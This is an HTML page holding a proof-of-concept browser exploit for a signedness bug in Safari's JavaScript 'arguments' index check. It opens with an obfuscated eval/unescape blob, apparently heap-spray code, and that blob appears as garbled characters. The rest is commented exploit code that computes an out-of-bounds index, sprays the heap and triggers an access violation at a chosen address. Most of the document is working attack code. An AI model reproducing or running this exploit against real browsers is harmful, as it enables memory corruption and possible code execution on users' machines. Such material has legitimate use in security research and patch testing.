<BODY>
<CODE id="sploit status"></CODE>
<CODE id="heapspray status"></CODE>
<SCRIPT>
i=0;eval(unescape(("g??#M??????#??g#?¡ë?????¡@?¡?¡®?¡?¡?¡???¡?¡ë?¡????@g?¡®??@???¡®??????#???????¡??????g???????¡ë??????????????M??N????M@M?¡®M??M#M??M?¡M??MgM??M?¡ëM??M??M??MMMNM??N@N?¡®N??N#N??N?¡N??NgN??N?¡ëN??N??N??NMNNN????@???¡®??????#???????¡??????g???????¡ë??????????????M??N????????#??????#M????M??g??g?¡ëg@???¡????????????Ng???¡ë#M????Ng#MN??#??N??#M???????¡??@M#?¡??????g?????????¡N#M?????¡®???????¡ë???¡#M?¡ê?¡®#??M?????¡®g?????¡ëg??#M#??#??#
??g #
#M Ng??N??#??Q?? ??
???? ????g?????¡????g?????¡ë#??M??g#N @
#?? ???¡???¡ëg##M??N????gg??@???¡®g??g?????¡®g?¡ë ??
???? ?¡??Mg#N@????#?¡®???¡ë??N????????M???????¡??????#@?? ??
???? g##??NMg??g?¡g???? N??@g##??gM#????g???? ?¡@#Mg???¡?????? ??M?¡#?? ?¡ë
???¡ ??@#g??@??N?¡????@#?¡??N#?¡®????N?¡®#???? g#?¡®??#??#gMM?¡?? M?¡#???¡ë???¡ ??@#g??@??N?¡ ??
??@ #????N#??????N?¡®#????g##??#??#gMNN#?¡??N#?¡®???? NN#????N#??????g M#???????¡ ?¡???? ????#??????g?????????¡ ??
??g #N#M???¡êMg??#??g??#??N?¡®????#@????#@????#@???????????¡®???¡ë g##Mg##??g## ??g??gM?? ??????#M?? ?¡?¡ê?????¡#???¡???????¡???¡?? #
@?¡ ????????????g#MN?¡®#????#??#?????¡??#MN?¡®#????#??##???¡??#MN?¡®?¡ê@ #?¡®??##??#?????? Mg#M?? ???|?¡®????g#???¡?? ?????¡ë?¡?¡ë????#M# ??g??#??#?? ??
???? ?¡ë?¡?¡®????#M#?????????¡ë?¡?¡®N???¡#???¡ëg?????¡#M?¡ê??????M?¡®#M??Ng?¡?????????? ??g#??????????g#M ?¡???????¡ ??????????g#?¡#M?? #M?¡???????¡ ??
???? ????M??#M??Ng?¡????????#?????¡ë???? ??????#????g????????M???¡M??g?????? ???????????¡ëNM?????? ??g??M@ g?????????? ??
M?¡ #???¡ë???¡??@?¡???¡???????????? ?¡ë????g???????¡??????g#???¡ë?? ????N????M@?????¡#?? ???????| ?¡®g?????¡ë ??
?¡ë?? ??g??????????????g@?????? ?¡®M??g??????????M?¡????#?¡® ????#??????#?¡ê????#?¡????# ??????#?? ????#??g ??
???? ?¡???¡???????????¡gM???? ??????ggg#??@?????¡???¡ N#???¡M???????¡ë????????M?¡????#?¡®???? #????N# M???¡ë??N ??
@?? @g??#???¡@#M??g?? ???¡@?¡????N?¡M#??M???¡ @???¡ë????????g??????g#N???? @M???? @?¡@???¡ëg ?????¡?¡ ??
g# N???¡M#M?¡@?¡??g#N ???¡Mg?¡®M?????????????¡®N#M M?¡êM??N???¡gg??@?? ???¡?¡?? ???¡????????M?? N?????? ??
?¡?¡ ??N???¡ê???¡®???????????? ??M??N?????¡?????¡???¡ë????#??MM??N?????¡ ?????¡#Mg?????¡ #??MM?? N?????????¡?¡?¡ê M????# ??
g# ???¡g???¡?????¡ë??M???¡ ????g?¡g??????MM???????¡®MNN ?¡ë?????????? gM???? ??N#??#g #???? ??
???? g????#M??#g#?¡#M ??N?¡ëg#M??????????M NN?¡ëg #M??M ??????N# ??#g# ?¡
#M ??#M????M???¡???¡??g ????????gM?¡N?¡ N ?¡N?¡N ?¡????M??#????????gM?¡ ???????? g
??# ????????N#???????¡??# N?¡??????#?? M???? #M?¡®?? ?¡ë??# M?¡® ??NM????N?????????¡????M????#M?? #g# ??
???? ????g??????#g#?¡#M ??#??gM N?¡ëg#g?? g??M?? ??g???????¡ë ????????M?????????????¡®N #????#MN???? ?¡ê???¡ ??
?¡ë?? ?????????¡®????????N@?? ?¡ë#???? ??#M?¡???????¡?? ?? ??#???? ??#MN????#???? ???¡ë????????N?????????? ??g???????? ????#?¡®???¡ë ????N?? ??
???? ????g????#?????¡ë???¡ë# ???? ??????g????????g#M ????#???? g#N# M#??#????g??M??M N#????????#M ????#??M?? ????????N??g@????gg???? #?????? ??
g?? ?¡ë???¡ë????????#M????# ??gMNMg??g?¡g????N?? @????????#@ ???????¡® MN????g#?? ??M??????N# ??#M??# M????#???? ?¡®?¡#????M???? g??@?? ??
g?? ??????M??@???¡??#??g #?¡ë??N??@g????????@???¡M ??#?¡ë??N??N???? #?????¡® ?¡???¡??g?? ???¡®g#g# g?¡??MM ????g?? @???¡®???????? NMg #
g# ??@g??????g?????¡ë?? ?????¡ë??????Ng#??@???? ???????? g?¡g@??@g???? ????@?? ?¡??#?¡??# ?¡ë???¡®??@?? ?¡ê???¡®g?¡ g#?? ?¡???????????? g?¡ë?? @
???? g?????¡®??g??M?? ?¡??Ng?????????¡ë?????? N????g@N Mg@???¡®NM?? ??????# ?¡®MNN?¡ë g@NMg@ ???¡®NM ????M?? N#????#M ??#?¡ ??
?¡?? g#g??g??M?? ??g???????¡ë?????????? ????#???????? M?¡ë?? ?¡ë#??????????g ???????? ?¡®????M???? @??#??Q?? ?¡ëg#N #???? #M?? N????gg?? @M#?????? ?¡®???¡ë #
??M ?????????¡#??# M?¡êM#?¡®???¡ëg?????? g??????gg ??@??N?? ?¡gg??@???¡ g??g?? ????g???? ???¡?????? ???????? ???|g#?? ?¡g?? g#??@???? ???????????¡ê??@g#??@??M g
?¡g #g????@?????? ?¡???????¡g?????¡ ??N???????? ????????g?¡?? N??????@?? @????# ?¡ë???????? ????#?????? ?|??g?? ??????????@ M????@g# ?¡?????¡®?¡MN #???¡ë#Mg# ?¡
???? ?¡®?¡M?¡?????? ?¡M#?????¡®?¡???¡ ??g?????¡ë ??Ng#????g?? ???¡?????? Mg#???? ??@??# ??????@?? ????@?? ?????????|g#???¡g???? @???¡??????N?? ??#?¡®?¡ê ??????#???? ?¡ë
??N #????@??@ ??????N??N????# ??????#M ????????#@?????? ??????#N #N#?¡®?? ?¡ë???¡ë???? ???¡ë?????? ???????? ?????? #N#N#?¡®???¡ë???????¡ëN@???¡ë #??M?? ????N@ #NM ?¡ë
N# ???¡ë???¡g?? ??#????g#g# #M????N @??MM?¡ë#?????? #M?????? ??M?¡ë?? ?¡ë?????? ?????????¡ë ???¡g ????#?? ??g#g#???? M?¡ëM NgMg M
N?? #???¡ê???????? @??????#??????@??????#???? ???¡ëg##???¡???? ????@g g???¡ëg ???????? @M??g# ????g ?????¡ ???? ??@???¡ê ??@g# M
???¡ ????????????N?? N????????g#???¡ë#M?????? ?????¡®g#?¡?¡ë#M ?¡???¡M ???????¡ë?? ?¡ëg# #M?¡ê@ ?????? ??#M# ?????? ???¡ë?? g#M?? #
??g g?¡® ??????#?¡???¡???? #NM???????¡?????¡?¡®????#?¡® MNN?¡ë??#NM?? ?????¡?? ???¡?¡®M?? N# M?? ??#g #???¡ëN @#???¡ ?????? #??N#?? #
g# ???¡ë????#M ??#g#???¡ëg?¡®?? ????M????#?¡®MN???¡????g#???¡ g??N?????¡?¡?? #?¡ë?? ?¡®??@?? ????# ??????@?? ???|??g?? ??Mg #????M?? ??
g?? ??g#?????¡?¡ë????# ?¡®MNgMN?¡ëg#?? ???¡?¡ëM??N #M????#Mg #????N??g#N#MM?? ??M???¡ê?¡ ??#?? ??N??g#??#M M????????#?¡?? N#N ??#M???? ??
N?¡ ?¡ë??????????N?¡?¡®???????¡ë???? #??#?????¡ëN?????? ??@#M?????? N?¡?¡®N???¡ #???¡ëg?????¡ ???¡ë????# ??#??g# ??g# M??#Mg#??N????M??#?¡???? ?¡ë#?¡ë# ??N???????? #
?¡?? ???¡ë#?¡ë???????¡®g#?¡?¡ë?¡??g#??g?¡M #Mg#??g??????# g#???¡ë???? N??????g# ??gN@ ?????¡???? ??#????M????N?????????¡ëN????????@???¡ë??Mg#??g N@?? ?¡ë???????¡ë???¡ëg#?????????? ???????? ??#M?¡?? ??
???? ?¡ë??g????#M??#Mg#????M ?¡??#???¡??N?¡ëg# M???????¡?? ?????¡???¡??g ?????¡® ??????#?? ?????¡??????@??@??N???¡ëg#??N??M??????#????g#??@??????@??#??????N?????? ?¡ë???¡® ???¡ë??@g????????@g #?????? @gN???¡?? #
??g #?¡ë??N??M???¡??????N?? g??????#?¡?????¡ë#?¡ë ??N????g #?????¡?¡ë????# ?¡®MN ???¡????g#???¡g?????¡®??#???????????????¡ ???¡êg??M????g??@??g?? ?¡®g?? ??????????g???¡ ?? ??#??M?? g??g?¡ëg@ ??
?¡?? ??????????N?????¡ë???¡®?? ??N?????????¡ë#??M?? ggM???? ??????gg??N?? g??# ???¡ëggM??????????gg??N??g ??#???????¡ë#???? ?¡®?¡?¡ë??@g#?????? @???? ?? ????N???¡?? N????????M?? ??
???? ??????MN#??gMgM?? #g?????¡??N??g???¡® ????????N Mg#g##?¡ë??N ????# ?¡®?¡ê??????#?????¡ë?????? ??#??g??#g??????g#?¡®??#?? #M?¡MgM?? g?? g??g?¡???¡M ?¡???¡ë?¡?¡ë???? M
??# @M?¡???¡ë?¡?¡®????M??# @gM?¡@?????¡#g?¡ëg #g???? ?¡??M?¡?¡êg@???¡?? ?¡ê???¡ë ???????¡ë???¡êN??g #?¡?¡®?¡?¡êg??g??M????g?¡?¡g?¡??N?? #g?? ???¡ë??????N?¡ ?????¡ë ?¡??????g?????¡ë???¡®?? N???¡ê???¡?¡?¡ë?? ??
???¡ ????g@?¡????N??????# ?????¡#???¡ëg?????¡?? ????????M g@??????N???¡??N g??g?¡® ????g#???¡ g???¡?????¡ë??M???¡????g?¡g????@???¡??N?? gg?? ???????¡®??#?¡?? ?¡???????? ????g?????¡?????????????????¡???????????? ?¡
#?? ?¡ëg?????¡??##??#??# ??????g@g?????¡®g?¡ë ???¡#@ g????@?????¡?????????¡ë ??g???¡ë ?¡#g ?????¡®g?? g????g??????Ng#g?¡?? ??g#g ??g?????????¡ë?¡?¡ë?? ????#?????????? ?¡g??????#????#????#M??N????g?? ??
?¡ë?? g????????g????Ng?¡g# ???????¡®??g???¡??Ng?? M?????? ??M???¡®g????gg?¡??M???¡??Ng ??g#?? N??#??Q ???????????¡???¡??N???? ?¡?????? ???????¡ë????g?¡ëg?????¡g#???¡®??????#?????? ?¡????M@?¡???¡???????¡???¡?? ??
???? ?????¡ë????M?¡®????????g?¡g?? g@g?¡g?????¡???????¡ ??M???? ??Ng??M?????¡ë???????? M#??N g?¡??M?? ??????M???¡??????#??M?¡ ?????¡??????M ????N?¡?????¡®g????g???¡g????gMg ?????¡?????¡g?? ??
??g #???¡M??g??????g?¡g#M?¡ë#@g??# ?¡®??##??????#??M?????¡ë??NM?? #M???? ???¡????M???? ?????????? ??N?? ?¡???????¡®??N????????????MM?????¡gg???? ?¡®g@g@????MN???¡ë#??gM M
???? NNMg@???????¡®???¡ê???¡????????N@??N??????@N?¡®#??g??#@N????M?? ?????? ??N N#???¡ë g??N???¡#???¡g??g??M????gN?¡?? ????N????g#g@#?? N
???? ?¡®?¡???¡??g????#NM???????¡??????@??????N???¡ ??@Ng M#?¡?? ?????????????¡???????¡?¡®N?? M#??Ng@g???? ??
g?? ????g??g?¡ëg@???¡??N g???? ???¡?¡®N?¡ë ?????¡???¡??N ?????¡ë???? ??
?¡?? ?????????? ?????? @
N?? ?¡???????? ?¡ ??
N?? g#?¡ë??Ng N
???¡ ??????N??g N
???? #?????????? ??
???¡ ???¡êg????g?? ?¡®
g?? ??????????g???¡ N
Mg ?????¡NNM?¡?¡# ??
???? ???|?¡®g?????¡ë????## ??
@?? N?¡????@N?????????? ????g????????@?¡?????? ??
???? ?¡®??N??@????g?¡ëg?????¡g#??????N????g ?¡®??????#?¡???¡????#?????????? #
???? #M?¡??????g?¡?? N???????¡????m?????¡???????????¡???????¡ëg#????M??g???¡????????gM????g ??
#?? #M?¡?¡ ??M??N?¡®?????¡?¡ë?¡#???????¡ëg#??#????????g#???????¡®???¡ê ??
???? gg ??????g?¡??N??????????N???????????¡®g????M ??
@?? ?? ???¡????g@??@??N??#???¡ë?? ??
g?? ??
???¡?¡®????????#??????????g????????#?¡êM#g#???¡ê????#??M??M?¡ê??????#M????g??#M??????Ng#g@???????¡ëg??????g????N??#????????g?????¡®g????????#???¡ë???¡ë???¡ë??N???????????¡ë??N????g????Ng@????g@???????¡ë???¡ë???¡ë#?????¡g?????????????????????¡ë#????????????M??#????#??#?¡ê?¡??#?¡®").replace(/./g,function(c){return" `'^*\/|-_.swdibYPW,".indexOf(c)<0?(i++%2?'':'%')+(c.charCodeAt()&15).toString(16):''})))
// The index for the "arguments" array in a JavaScript function in
// Safari suffers from a signedness issue that allows access to elements
// that are out of bounds. The index is cast to a signed value before it
// is compared to the length of the array to check if it is within the
// bounds. Integer values larger than 0x8000,0000 will be cast to a
// negative value and because they are always smaller than the length,
// they are treated as a valid index.
// The index into the arguments array ends up in instructions
// that multiply it by 4 to access data in an array of 32 bit values.
// There are no checks for overflows in this calculation. This allows us
// to cause it to access anything in memory:
// Pointer to object = base address + 4 * index
// The base address varies only slightly and is normally about
// 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
// predictable location using heap spraying, we can then calculate an
// index that will access this memory.
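var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
// Not referenced anywhere in this script; presumably read by the heap-spray
// code defined elsewhere (HeapSpray2 is not in this file) - verify before
// removing.
var iTargetArea = 0x10000000;
// Be advised that heap spraying is "upside down" in Safari: strings
// are allocated at high addresses first and as the heap grows, the
// addresses go down. The heap will therefore grow in between a lot of
// DLLs which reside in this area of the address space as well.
// We'll need to find an area of memory to spray that is not likely to
// contain a DLL and easy to reach.
var iTargetAddress = 0x55555555;
// iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
// 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0);
// iIndex = (iTargetAddress - iBase) / 4
var iIndex = Math.floor(iRequiredMultiplicationResult / 4);
// We need to trigger the signedness issue so the index must be larger
// than 0x8000,0000. Because of the integer overflow in the
// multiplication, we can safely add 0x4000,0000 as often as we want;
// the multiplication will remove it from the result.
while (iIndex < 0x80000000) iIndex += 0x40000000;
// Number#toString takes only a radix; the earlier "toString(16, 8)" calls
// silently ignored the width argument, so no zero-padding ever happened.
// Pad to at least eight hex digits by hand (longer values are left intact).
function hex8(iNumber) {
  var sHex = iNumber.toString(16);
  while (sHex.length < 8) sHex = "0" + sHex;
  return sHex;
}
// Status line for the page; the values shown are the ones computed above.
document.getElementById("sploit status").innerHTML = (
  "iBase + 4 * iIndex = " +
  "0x" + hex8(iBase) + " + 4 * 0x" + hex8(iIndex) + " = " +
  "0x" + hex8(iBase + 4 * iIndex) + "<BR>"
);
// Set up heap spray
var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF));
oHeapSpray.oOutputElement = document.getElementById("heapspray status");
// Spray heap asynchronously and call sploit when done.
oHeapSpray.spray(sploit);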
function sploit(oHeapSpray) {
// Callback handed to oHeapSpray.spray() above and invoked once the spray
// has finished; the oHeapSpray argument is not used in this body.
// This will cause an access violation using the value 0xDEADBEEF,
// which comes from the strings we sprayed the heap with.
// 6aa3d57f 8b4f0c mov ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
// iIndex (forced above 0x8000,0000 by the script above) is read from the
// enclosing script scope. The expression is evaluated only for its side
// effect and nothing is returned; on an engine that bounds-checks the
// arguments object this is an ordinary out-of-range lookup yielding
// undefined.
arguments[iIndex];
}
function DWORD(iValue) {
  // Pack a 32-bit integer into a two-character string, low half first.
  // String.fromCharCode keeps only the low 16 bits of each argument, so
  // the sign bit that ">>" may propagate into the high half is discarded.
  var iLow = iValue & 0xFFFF;
  var iHigh = iValue >> 16;
  return String.fromCharCode(iLow, iHigh);
}
</SCRIPT>
</BODY>